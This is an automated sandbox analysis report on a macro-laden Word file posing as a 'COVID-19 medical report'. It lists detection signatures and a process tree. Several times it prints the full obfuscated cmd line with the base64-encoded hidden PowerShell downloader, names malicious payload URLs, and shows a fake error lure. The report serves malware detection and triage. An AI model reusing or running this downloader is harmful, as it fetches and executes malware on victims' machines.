Loading ...

Play interactive tourEdit tour

Analysis Report XP-9743 Medical report COVID-19.doc

Overview

General Information

Sample Name:XP-9743 Medical report COVID-19.doc
Analysis ID:338773
MD5:da92c55d4b08367fb79a6bc6ae4da985
SHA1:8ee3239cfb5dd7d9ddd8e503c8fec19e21ca3c3d
SHA256:137602cebf7c61fe1bb6647160167813271afbd74a52fcccf03a0ad590a9ef61

Most interesting Screenshot:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Document contains an embedded VBA with many randomly named variables
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Obfuscated command line found
Potential dropper URLs found in powershell memory
Powershell drops PE file
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2336 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cmd.exe (PID: 1100 cmdline: cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgACQAOABaAEcAIAAgAD0AIABbAHQAWQBwAGUAXQAoACIAewAyAH0AewA1AH0AewAwAH0AewAxAH0AewAzAH0AewA0AH0AIgAtAGYAIAAnAFQARQAnACwAJwBtAC4AJwAsACcAUwB5ACcALAAnAGkAbwAnACwAJwAuAEQASQByAEUAQwB0AE8AUgBZACcALAAnAFMAJwApADsAIAAgACAAJABEADAAQwBxACAAPQAgAFsAVABZAHAAZQBdACgAIgB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAcwBFAHIAdgBJAEMARQBQAG8AJwAsACcAVABlAG0ALgBuAEUAdAAuACcALAAnAFMAWQBzACcALAAnAGkATgB0AG0AYQAnACwAJwBuAEEARwBFAFIAJwApACAAOwAgACQASgBiAHoAMwB5AGEAYQA9ACQARAA1ADMARQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA3ADYAUAA7ACQARwA3ADMATwA9ACgAJwBGACcAKwAoACcAMAAnACsAJwA0AFYAJwApACkAOwAgACAAKAAgACAARwBlAHQALQBWAGEAcgBJAEEAQgBsAGUAIAAoACIAOABaACIAKwAiAGcAIgApACAAIAAtAHYAQQBsAFUAZQBPAE4AIAApADoAOgAiAGMAcgBFAGAAQQBgAFQAZQBEAGkAUgBgAGUAQwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB0AEsAJwArACgAJwBMACcAKwAnAEsAJwArACcAagBsADQAOABrAHIAJwApACsAJwB0ACcAKwAoACcASwBMAE4AcQAnACsAJwBtADkAJwApACsAKAAnAHQAJwArACcAeQA5ACcAKQArACcAdAAnACsAJwBLAEwAJwApAC0AcgBlAHAAbABBAGMAZQAgACAAKAAnAHQASwAnACsAJwBMACcAKQAsAFsAQwBIAEEAcgBdADkAMgApACkAOwAkAFAANAAzAFcAPQAoACgAJwBVAF8AJwArACcAMgAnACkAKwAnAFAAJwApADsAIAAgACgAIAAgAGMAaABJAEwAZABpAFQAZQBNACAAVgBhAHIASQBBAEIAbABFADoAZAAwAGMAcQAgACAAKQAuAHYAYQBMAHUAZQA6ADoAIgBzAGAAZQBjAFUAUgBJAHQAYABZAHAAUgBPAHQAYABPAEMAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABTADgAMgBHAD0AKAAoACcARwA5ACcAKwAnADAAJwApACsAJwBNACcAKQA7ACQARAA2AHQAcgB3ADAAMgAgAD0AIAAoACgAJwBTADkAJwArACcAMwAnACkAKwAnAEUAJwApADsAJABYADYAXwBNAD0AKAAnAEQAMwAnACsAJwAwAFAAJwApADsAJABHADYAYQBqAHYAOABkAD0AJABIAE8ATQBFACsAKAAoACcAewAwACcAKwAnAH0ASwBqAGwANAA4AGsAcgAnACsAJwB7ADAAfQBOAHEAJwArACgAJwBtADkAdAB5ACcAKwAnADkAJwApACsAJwB7ADAAfQAnACkALQBmACAAIABbAEMASABhAHIAXQA5ADIAKQArACQARAA2AHQAcgB3ADAAMgArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFYAMwA1AFUAPQAoACgAJwBTADUAJwArACcAXwAnACkAKwAnAFUAJwApADsAJABKAGkAdABvAGEAMgBlAD0AKAAoACcAdwBdAHgAbQBbAHYAcwAnACsAJwA6AC8ALwByAGUAbQBlAGQAJwArACcAaQBpACcAKwAnAHMALgAnACsAJwBjACcAKwAnAG8AJwArACcAbQAvAHQALwBnAG0AMgBYAC8AQAAnACsAJwB3ACcAKQArACgAJwBdAHgAJwArACcAbQBbAHYAOgAnACsAJwAvAC8AYQB2AGEAJwApACsAKAAnAGQAbgAnACsAJwBhAG4AJwApACsAKAAnAHMAYQAnACsAJwBoACcAKQArACcAaQBuACcAKwAoACcALgBjACcAKwAnAG8AbQAnACkAKwAoACcALwAnACsAJwB3AHAAJwArACcALQBpAG4AYwAnACkAKwAnAGwAdQAnACsAKAAnAGQAZQAnACsAJwBzAC8AdwAvAEAAJwApACsAJwB3ACcAKwAnAF0AJwArACgAJwB4ACcAKwAnAG0AWwAnACkAKwAoACcAdgA6AC8ALwAnACsAJwBzAG8AbAAnACsAJwBpAGMAbwAnACkAKwAnAG4AJwArACgAJwAuAHUAcwAnACsAJwAvAGEAbABsAGEAJwArACcAbQAnACsAJwAtAGMAeQAnACkAKwAoACcAYwBsAGUAJwArACcALQAxAGMANAAnACkAKwAoACcAZwBuACcAKwAnAC8AZgA1ACcAKQArACcAegAvACcAKwAoACcAQAAnACsAJwB3AF0AJwApACsAKAAnAHgAJwArACcAbQBbACcAKwAnAHYAOgAvACcAKwAnAC8AdwB3AHcALgByAGkAcABhAHIAYQB6AGkAJwArACcAbwBuACcAKwAnAGkAJwArACcALQAnACkAKwAoACcAcgBhAGQAaQAnACsAJwBvACcAKQArACcAdAB2ACcAKwAnAC4AYwAnACsAKAAnAG8AbQAnACsAJwAvAHMAbwAnACkAKwAnAGYAdAAnACsAKAAnAGEAYwAnACsAJwB1ACcAKQArACgAJwBsACcAKwAnAG8AdQBzAC8AJwArACcARABaAHoALwAnACkAKwAnAEAAJwArACgAJwB3ACcAKwAnAF0AeABtAFsAJwApACsAKAAnAHYAOgAvACcAKwAnAC8AJwApACsAKAAnAHcAdwAnACsAJwB3ACcAKQArACgAJwAuAGEAZwByACcAKwAnAGkAJwArACcAYwBhAG0AcAAnACsAJwBlAGcAJwApACsAKAAnAGcAaQAnACsAJwBvACcAKwAnAGMAbwByACcAKQArACgAJwB0AGUAJwArACcAYwBvAG0AbwAnACkAKwAnAHQAdAAnACsAJwBvAC4AJwArACgAJwBpAHQAJwArACcALwAnACkAKwAoACcAdwBwACcAKwAnAC0AJwApACsAKAAnAGEAJwArACcAZABtACcAKQArACgAJwBpACcAKwAnAG4AJwArACcALwBzADcAJwArACcAcAAxAC8AQAB3AF0AJwArACcAeABtAFsAJwApACsAJwB2ACcAKwAnAHMAOgAnACsAJwAvAC8AJwArACcAdwB3ACcAKwAnAHcAJwArACgAJwAuAHMAdABhAHIAbAAnACsAJwBpACcAKwAnAG4AJwApACsAKAAnAGcAdABlAGMAaABzAC4AYwBvAG0AJwArACcALwAnACsAJwBHAE4ATQAnACsAJwAvAEAAdwAnACsAJwBdAHgAbQBbAHYAJwApACsAKAAnADoAJwArACcALwAnACsAJwAvAGgAZQBsAGwAYQBzACcAKQArACgAJwAtAGQAJwArACcAYQByAG0AcwAnACsAJwB0AGEAZAAnACsAJwB0AC4AZAAnACsAJwBlACcAKQArACcALwBjACcAKwAoACcAZwBpAC0AYgBpAG4AJwArACcALwBaACcAKQArACcAUwAnACsAKAAnAG8AJwArACcAbwAvACcAKQApAC4AIgByAEUAcABsAEEAYABjAGUAIgAoACgAKAAnAHcAXQB4AG0AJwArACcAWwAnACkAKwAnAHYAJwApACwAKABbAGEAcgByAGEAeQBdACgAKAAnAGQAcwAnACsAKAAnAGUAJwArACcAdwBmACcAKQApACwAKAAnAHcAZQAnACsAKAAnAHYAdwAnACsAJwBlACcAKQApACkALAAoACcAYQBlACcAKwAnAGYAZgAnACkALAAoACcAaAB0ACcAKwAnAHQAcAAnACkAKQBbADIAXQApAC4AIgBTAGAAUABMAEkAdAAiACgAJABPADUAXwBZACAAKwAgACQASgBiAHoAMwB5AGEAYQAgACsAIAAkAEwAXwAwAEMAKQA7ACQAVgAxADEAVgA9ACgAJwBIACcAKwAoACcAXwA4ACcAKwAnAE0AJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAE0AbAA5AHgAdwA3AG0AIABpAG4AIAAkAEoAaQB0AG8AYQAyAGUAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAdwAtACcAKwAnAE8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAHMAWQBTAHQAZQBtAC4ATgBFAFQALgB3AEUAQgBDAEwASQBFAG4AVAApAC4AIgBkAG8AVwBgAE4ATABPAGEARABGAEkAYABMAEUAIgAoACQATQBsADkAeAB3ADcAbQAsACAAJABHADYAYQBqAHYAOABkACkAOwAkAE0AMAA2AEsAPQAoACgAJwBBACcAKwAnADUAMQAnACkAKwAnAEIAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAEcANgBhAGoAdgA4AGQAKQAuACIAbABgAEUATgBHAHQASAAiACAALQBnAGUAIAAzADAANAA0ADcAKQAgAHsAJgAoACcAcgAnACsAJwB1AG4AJwArACcAZABsAGwAMwAyACcAKQAgACQARwA2AGEAagB2ADgAZAAsACgAKAAnAFMAaAAnACsAJwBvACcAKQArACgAJwB3ACcAKwAnAEQAaQAnACsAJwBhAGwAbwAnACkAKwAnAGcAQQAnACkALgAiAHQAYABvAFMAVAByAGAASQBuAEcAIgAoACkAOwAkAFcANQAyAE0APQAoACgAJwBPADEAJwArACcAOQAnACkAKwAnAFIAJwApADsAYgByAGUAYQBrADsAJABLADgAMQBBAD0AKAAnAEUAJwArACgAJwA3ACcAKwAnADQARAAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUwA1ADIATgA9ACgAJwBZADcAJwArACcAMgBTACcAKQA= MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • msg.exe (PID: 2572 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)
    • powershell.exe (PID: 2552 cmdline: powershell -w hidden -enc IAAgACQAOABaAEcAIAAgAD0AIABbAHQAWQBwAGUAXQAoACIAewAyAH0AewA1AH0AewAwAH0AewAxAH0AewAzAH0AewA0AH0AIgAtAGYAIAAnAFQARQAnACwAJwBtAC4AJwAsACcAUwB5ACcALAAnAGkAbwAnACwAJwAuAEQASQByAEUAQwB0AE8AUgBZACcALAAnAFMAJwApADsAIAAgACAAJABEADAAQwBxACAAPQAgAFsAVABZAHAAZQBdACgAIgB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAcwBFAHIAdgBJAEMARQBQAG8AJwAsACcAVABlAG0ALgBuAEUAdAAuACcALAAnAFMAWQBzACcALAAnAGkATgB0AG0AYQAnACwAJwBuAEEARwBFAFIAJwApACAAOwAgACQASgBiAHoAMwB5AGEAYQA9ACQARAA1ADMARQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA3ADYAUAA7ACQARwA3ADMATwA9ACgAJwBGACcAKwAoACcAMAAnACsAJwA0AFYAJwApACkAOwAgACAAKAAgACAARwBlAHQALQBWAGEAcgBJAEEAQgBsAGUAIAAoACIAOABaACIAKwAiAGcAIgApACAAIAAtAHYAQQBsAFUAZQBPAE4AIAApADoAOgAiAGMAcgBFAGAAQQBgAFQAZQBEAGkAUgBgAGUAQwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB0AEsAJwArACgAJwBMACcAKwAnAEsAJwArACcAagBsADQAOABrAHIAJwApACsAJwB0ACcAKwAoACcASwBMAE4AcQAnACsAJwBtADkAJwApACsAKAAnAHQAJwArACcAeQA5ACcAKQArACcAdAAnACsAJwBLAEwAJwApAC0AcgBlAHAAbABBAGMAZQAgACAAKAAnAHQASwAnACsAJwBMACcAKQAsAFsAQwBIAEEAcgBdADkAMgApACkAOwAkAFAANAAzAFcAPQAoACgAJwBVAF8AJwArACcAMgAnACkAKwAnAFAAJwApADsAIAAgACgAIAAgAGMAaABJAEwAZABpAFQAZQBNACAAVgBhAHIASQBBAEIAbABFADoAZAAwAGMAcQAgACAAKQAuAHYAYQBMAHUAZQA6ADoAIgBzAGAAZQBjAFUAUgBJAHQAYABZAHAAUgBPAHQAYABPAEMAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABTADgAMgBHAD0AKAAoACcARwA5ACcAKwAnADAAJwApACsAJwBNACcAKQA7ACQARAA2AHQAcgB3ADAAMgAgAD0AIAAoACgAJwBTADkAJwArACcAMwAnACkAKwAnAEUAJwApADsAJABYADYAXwBNAD0AKAAnAEQAMwAnACsAJwAwAFAAJwApADsAJABHADYAYQBqAHYAOABkAD0AJABIAE8ATQBFACsAKAAoACcAewAwACcAKwAnAH0ASwBqAGwANAA4AGsAcgAnACsAJwB7ADAAfQBOAHEAJwArACgAJwBtADkAdAB5ACcAKwAnADkAJwApACsAJwB7ADAAfQAnACkALQBmACAAIABbAEMASABhAHIAXQA5ADIAKQArACQARAA2AHQAcgB3ADAAMgArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFYAMwA1AFUAPQAoACgAJwBTADUAJwArACcAXwAnACkAKwAnAFUAJwApADsAJABKAGkAdABvAGEAMgBlAD0AKAAoACcAdwBdAHgAbQBbAHYAcwAnACsAJwA6AC8ALwByAGUAbQBlAGQAJwArACcAaQBpACcAKwAnAHMALgAnACsAJwBjACcAKwAnAG8AJwArACcAbQAvAHQALwBnAG0AMgBYAC8AQAAnACsAJwB3ACcAKQArACgAJwBdAHgAJwArACcAbQBbAHYAOgAnACsAJwAvAC8AYQB2AGEAJwApACsAKAAnAGQAbgAnACsAJwBhAG4AJwApACsAKAAnAHMAYQAnACsAJwBoACcAKQArACcAaQBuACcAKwAoACcALgBjACcAKwAnAG8AbQAnACkAKwAoACcALwAnACsAJwB3AHAAJwArACcALQBpAG4AYwAnACkAKwAnAGwAdQAnACsAKAAnAGQAZQAnACsAJwBzAC8AdwAvAEAAJwApACsAJwB3ACcAKwAnAF0AJwArACgAJwB4ACcAKwAnAG0AWwAnACkAKwAoACcAdgA6AC8ALwAnACsAJwBzAG8AbAAnACsAJwBpAGMAbwAnACkAKwAnAG4AJwArACgAJwAuAHUAcwAnACsAJwAvAGEAbABsAGEAJwArACcAbQAnACsAJwAtAGMAeQAnACkAKwAoACcAYwBsAGUAJwArACcALQAxAGMANAAnACkAKwAoACcAZwBuACcAKwAnAC8AZgA1ACcAKQArACcAegAvACcAKwAoACcAQAAnACsAJwB3AF0AJwApACsAKAAnAHgAJwArACcAbQBbACcAKwAnAHYAOgAvACcAKwAnAC8AdwB3AHcALgByAGkAcABhAHIAYQB6AGkAJwArACcAbwBuACcAKwAnAGkAJwArACcALQAnACkAKwAoACcAcgBhAGQAaQAnACsAJwBvACcAKQArACcAdAB2ACcAKwAnAC4AYwAnACsAKAAnAG8AbQAnACsAJwAvAHMAbwAnACkAKwAnAGYAdAAnACsAKAAnAGEAYwAnACsAJwB1ACcAKQArACgAJwBsACcAKwAnAG8AdQBzAC8AJwArACcARABaAHoALwAnACkAKwAnAEAAJwArACgAJwB3ACcAKwAnAF0AeABtAFsAJwApACsAKAAnAHYAOgAvACcAKwAnAC8AJwApACsAKAAnAHcAdwAnACsAJwB3ACcAKQArACgAJwAuAGEAZwByACcAKwAnAGkAJwArACcAYwBhAG0AcAAnACsAJwBlAGcAJwApACsAKAAnAGcAaQAnACsAJwBvACcAKwAnAGMAbwByACcAKQArACgAJwB0AGUAJwArACcAYwBvAG0AbwAnACkAKwAnAHQAdAAnACsAJwBvAC4AJwArACgAJwBpAHQAJwArACcALwAnACkAKwAoACcAdwBwACcAKwAnAC0AJwApACsAKAAnAGEAJwArACcAZABtACcAKQArACgAJwBpACcAKwAnAG4AJwArACcALwBzADcAJwArACcAcAAxAC8AQAB3AF0AJwArACcAeABtAFsAJwApACsAJwB2ACcAKwAnAHMAOgAnACsAJwAvAC8AJwArACcAdwB3ACcAKwAnAHcAJwArACgAJwAuAHMAdABhAHIAbAAnACsAJwBpACcAKwAnAG4AJwApACsAKAAnAGcAdABlAGMAaABzAC4AYwBvAG0AJwArACcALwAnACsAJwBHAE4ATQAnACsAJwAvAEAAdwAnACsAJwBdAHgAbQBbAHYAJwApACsAKAAnADoAJwArACcALwAnACsAJwAvAGgAZQBsAGwAYQBzACcAKQArACgAJwAtAGQAJwArACcAYQByAG0AcwAnACsAJwB0AGEAZAAnACsAJwB0AC4AZAAnACsAJwBlACcAKQArACcALwBjACcAKwAoACcAZwBpAC0AYgBpAG4AJwArACcALwBaACcAKQArACcAUwAnACsAKAAnAG8AJwArACcAbwAvACcAKQApAC4AIgByAEUAcABsAEEAYABjAGUAIgAoACgAKAAnAHcAXQB4AG0AJwArACcAWwAnACkAKwAnAHYAJwApACwAKABbAGEAcgByAGEAeQBdACgAKAAnAGQAcwAnACsAKAAnAGUAJwArACcAdwBmACcAKQApACwAKAAnAHcAZQAnACsAKAAnAHYAdwAnACsAJwBlACcAKQApACkALAAoACcAYQBlACcAKwAnAGYAZgAnACkALAAoACcAaAB0ACcAKwAnAHQAcAAnACkAKQBbADIAXQApAC4AIgBTAGAAUABMAEkAdAAiACgAJABPADUAXwBZACAAKwAgACQASgBiAHoAMwB5AGEAYQAgACsAIAAkAEwAXwAwAEMAKQA7ACQAVgAxADEAVgA9ACgAJwBIACcAKwAoACcAXwA4ACcAKwAnAE0AJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAE0AbAA5AHgAdwA3AG0AIABpAG4AIAAkAEoAaQB0AG8AYQAyAGUAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAdwAtACcAKwAnAE8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAHMAWQBTAHQAZQBtAC4ATgBFAFQALgB3AEUAQgBDAEwASQBFAG4AVAApAC4AIgBkAG8AVwBgAE4ATABPAGEARABGAEkAYABMAEUAIgAoACQATQBsADkAeAB3ADcAbQAsACAAJABHADYAYQBqAHYAOABkACkAOwAkAE0AMAA2AEsAPQAoACgAJwBBACcAKwAnADUAMQAnACkAKwAnAEIAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAEcANgBhAGoAdgA4AGQAKQAuACIAbABgAEUATgBHAHQASAAiACAALQBnAGUAIAAzADAANAA0ADcAKQAgAHsAJgAoACcAcgAnACsAJwB1AG4AJwArACcAZABsAGwAMwAyACcAKQAgACQARwA2AGEAagB2ADgAZAAsACgAKAAnAFMAaAAnACsAJwBvACcAKQArACgAJwB3ACcAKwAnAEQAaQAnACsAJwBhAGwAbwAnACkAKwAnAGcAQQAnACkALgAiAHQAYABvAFMAVAByAGAASQBuAEcAIgAoACkAOwAkAFcANQAyAE0APQAoACgAJwBPADEAJwArACcAOQAnACkAKwAnAFIAJwApADsAYgByAGUAYQBrADsAJABLADgAMQBBAD0AKAAnAEUAJwArACgAJwA3ACcAKwAnADQARAAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUwA1ADIATgA9ACgAJwBZADcAJwArACcAMgBTACcAKQA= MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • rundll32.exe (PID: 2332 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll ShowDialogA MD5: DD81D91FF3B0763C392422865C9AC12E)
        • rundll32.exe (PID: 2760 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll ShowDialogA MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • rundll32.exe (PID: 2732 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Giyrh\pugu.vsm',ShowDialogA MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • rundll32.exe (PID: 1980 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ivtnyogqxjx\ctmhexvkrv.xdn',ShowDialogA MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 2724 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pvbzatsazzovzkv\hcdstjffkhswof.tvm',ShowDialogA MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 2500 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ipdtn\rmgx.ktd',ShowDialogA MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 1776 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wxiibgduobebnp\hfpumnmgeezpt.jsh',ShowDialogA MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 2808 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ndsevdxfleyh\dktakeexwon.agz',ShowDialogA MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 3068 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fmtjatw\czosow.gcn',ShowDialogA MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                        • rundll32.exe (PID: 3012 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Udumexhq\tqqkqid.sqp',ShowDialogA MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Suspicious Encoded PowerShell Command LineShow sources
Source: Process startedAuthor: Florian Roth, Markus Neis: Data: Command: powershell -w hidden -enc IAAgACQAOABaAEcAIAAgAD0AIABbAHQAWQBwAGUAXQAoACIAewAyAH0AewA1AH0AewAwAH0AewAxAH0AewAzAH0AewA0AH0AIgAtAGYAIAAnAFQARQAnACwAJwBtAC4AJwAsACcAUwB5ACcALAAnAGkAbwAnACwAJwAuAEQASQByAEUAQwB0AE8AUgBZACcALAAnAFMAJwApADsAIAAgACAAJABEADAAQwBxACAAPQAgAFsAVABZAHAAZQBdACgAIgB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAcwBFAHIAdgBJAEMARQBQAG8AJwAsACcAVABlAG0ALgBuAEUAdAAuACcALAAnAFMAWQBzACcALAAnAGkATgB0AG0AYQAnACwAJwBuAEEARwBFAFIAJwApACAAOwAgACQASgBiAHoAMwB5AGEAYQA9ACQARAA1ADMARQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA3ADYAUAA7ACQARwA3ADMATwA9ACgAJwBGACcAKwAoACcAMAAnACsAJwA0AFYAJwApACkAOwAgACAAKAAgACAARwBlAHQALQBWAGEAcgBJAEEAQgBsAGUAIAAoACIAOABaACIAKwAiAGcAIgApACAAIAAtAHYAQQBsAFUAZQBPAE4AIAApADoAOgAiAGMAcgBFAGAAQQBgAFQAZQBEAGkAUgBgAGUAQwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB0AEsAJwArACgAJwBMACcAKwAnAEsAJwArACcAagBsADQAOABrAHIAJwApACsAJwB0ACcAKwAoACcASwBMAE4AcQAnACsAJwBtADkAJwApACsAKAAnAHQAJwArACcAeQA5ACcAKQArACcAdAAnACsAJwBLAEwAJwApAC0AcgBlAHAAbABBAGMAZQAgACAAKAAnAHQASwAnACsAJwBMACcAKQAsAFsAQwBIAEEAcgBdADkAMgApACkAOwAkAFAANAAzAFcAPQAoACgAJwBVAF8AJwArACcAMgAnACkAKwAnAFAAJwApADsAIAAgACgAIAAgAGMAaABJAEwAZABpAFQAZQBNACAAVgBhAHIASQBBAEIAbABFADoAZAAwAGMAcQAgACAAKQAuAHYAYQBMAHUAZQA6ADoAIgBzAGAAZQBjAFUAUgBJAHQAYABZAHAAUgBPAHQAYABPAEMAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABTADgAMgBHAD0AKAAoACcARwA5ACcAKwAnADAAJwApACsAJwBNACcAKQA7ACQARAA2AHQAcgB3ADAAMgAgAD0AIAAoACgAJwBTADkAJwArACcAMwAnACkAKwAnAEUAJwApADsAJABYADYAXwBNAD0AKAAnAEQAMwAnACsAJwAwAFAAJwApADsAJABHADYAYQBqAHYAOABkAD0AJABIAE8ATQBFACsAKAAoACcAewAwACcAKwAnAH0ASwBqAGwANAA4AGsAcgAnACsAJwB7ADAAfQBOAHEAJwArACgAJwBtADkAdAB5ACcAKwAnADkAJwApACsAJwB7ADAAfQAnACkALQBmACAAIABbAEMASABhAHIAXQA5ADIAKQArACQARAA2AHQAcgB3ADAAMgArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFYAMwA1AFUAPQAoACgAJwBTADUAJwArACcAXwAnACkAKwAnAFUAJwApADsAJABKAGkAdABvAGEAMgBlAD0AKAAoACcAdwBdAHgAbQBbAHYAcwAnACsAJwA6AC8ALwByAGUAbQBlAGQAJwArACcAaQBpACcAKwAnAHMALgAnACsAJwBjACcAKwAnAG8AJwArACcAbQAvAHQALwBnAG0AMgBYAC8AQAAnACsAJwB3ACcAKQArACgAJwBdAHgAJwArACcAbQBbAHYAOgAnACsAJwAvAC8AYQB2AGEAJwApACsAKAAnAGQAbgAnACsAJwBhAG4AJwApACsAKAAnAHMAYQAnACsAJwBoACcAKQArACcAaQBuACcAKwAoACcALgBjACcAKwAnAG8AbQAnACkAKwAoACcALwAnACsAJwB3AHAAJwArACcALQBpAG4AYwAnACkAKwAnAGwAdQAnACsAKAAnAGQAZQAnACsAJwBzAC8AdwAvAEAAJwApACsAJwB3ACcAKwAnAF0AJwArACgAJwB4ACcAKwAnAG0AWwAnACkAKwAoACcAdgA6AC8ALwAnACsAJwBzAG8AbAAnACsAJwBpAGMAbwAnACkAKwAnAG4AJwArACgAJwAuAHUAcwAnACsAJwAvAGEAbABsAGEAJwArACcAbQAnACsAJwAtAGMAeQAnACkAKwAoACcAYwBsAGUAJwArACcALQAxAGMANAAnACkAKwAoACcAZwBuACcAKwAnAC8AZgA1ACcAKQArACcAegAvACcAKwAoACcAQAAnACsAJwB3AF0AJwApACsAKAAnAHgAJwArACcAbQBbACcAKwAnAHYAOgAvACcAKwAnAC8AdwB3AHcALgByAGkAcABhAHIAYQB6AGkAJwArACcAbwBuACcAKwAnAGkAJwArACcALQAnACkAKwAoACcAcgBhAGQAaQAnACsAJwBvACcAKQArACcAdAB2ACcAKwAnAC4AYwAnACsAKAAnAG8AbQAnACsAJwAvAHMAbwAnACkAKwAnAGYAdAAnACsAKAAnAGEAYwAnACsAJwB1ACcAKQArACgAJwBsACcAKwAnAG8AdQBzAC8AJwArACcARABaAHoALwAnACkAKwAnAEAAJwArACgAJwB3ACcAKwAnAF0AeABtAFsAJwApACsAKAAnAHYAO

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: http://hellas-darmstadt.de/cgi-bin/ZSoo/Avira URL Cloud: Label: malware
Source: http://solicon.us/allam-cycle-1c4gn/f5z/Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URLShow sources
Source: http://hellas-darmstadt.de/cgi-bin/ZSoo/Virustotal: Detection: 6%Perma Link
Source: http://solicon.us/allam-cycle-1c4gn/f5z/Virustotal: Detection: 6%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: XP-9743 Medical report COVID-19.docVirustotal: Detection: 19%Perma Link
Source: XP-9743 Medical report COVID-19.docReversingLabs: Detection: 13%
Machine Learning detection for dropped fileShow sources
